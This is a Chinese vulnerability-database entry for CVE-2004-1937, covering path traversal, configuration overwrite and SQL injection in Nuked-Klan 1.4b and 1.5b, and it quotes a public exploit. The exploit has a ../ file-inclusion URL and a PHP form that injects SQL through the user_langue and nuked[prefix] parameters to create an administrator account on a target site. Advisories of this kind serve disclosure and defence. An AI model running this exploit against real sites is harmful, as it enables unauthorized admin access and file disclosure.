Nuked-Klan多个漏洞

Nuked-Klan多个漏洞

漏洞ID 1107865 漏洞类型 路径遍历
发布时间 2004-04-12 更新时间 2005-10-20
图片[1]-Nuked-Klan多个漏洞-安全小百科CVE编号 CVE-2004-1937
图片[2]-Nuked-Klan多个漏洞-安全小百科CNNVD-ID CNNVD-200412-347
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23988
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-347
|漏洞详情
Nuked-KlaN1.4b和1.5b版本存在多个目录遍历漏洞。远程攻击者可以借助(1)index.php的user_langue参数或(2)update.php的langue参数或修改任意GLOBAL变量导致conf.inc.php之前globals.php下载(3)file参数中带有全域变量page的..序列或(4)user_langue的../globals.phpintheparameter读取或包含任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------
|参考资料

来源:BID
名称:10104
链接:http://www.securityfocus.com/bid/10104
来源:www.phpsecure.info
链接:http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
来源:XF
名称:nuked-klan-configurtion-corruption(15844)
链接:http://xforce.iss.net/xforce/xfdb/15844
来源:XF
名称:nuked-klan-file-include(15843)
链接:http://xforce.iss.net/xforce/xfdb/15843
来源:SECUNIA
名称:11341
链接:http://secunia.com/advisories/11341
来源:BUGTRAQ
名称:20040417[SCSA-028]Nuked-KlanMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108222826225823&w;=2

相关推荐: Cisco 7940/7960 VoIP 消息欺骗漏洞

Cisco 7940/7960 VoIP 消息欺骗漏洞 漏洞ID 1198714 漏洞类型 未知 发布时间 2005-07-11 更新时间 2005-07-11 CVE编号 CVE-2005-2181 CNNVD-ID CNNVD-200507-093 漏洞平…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享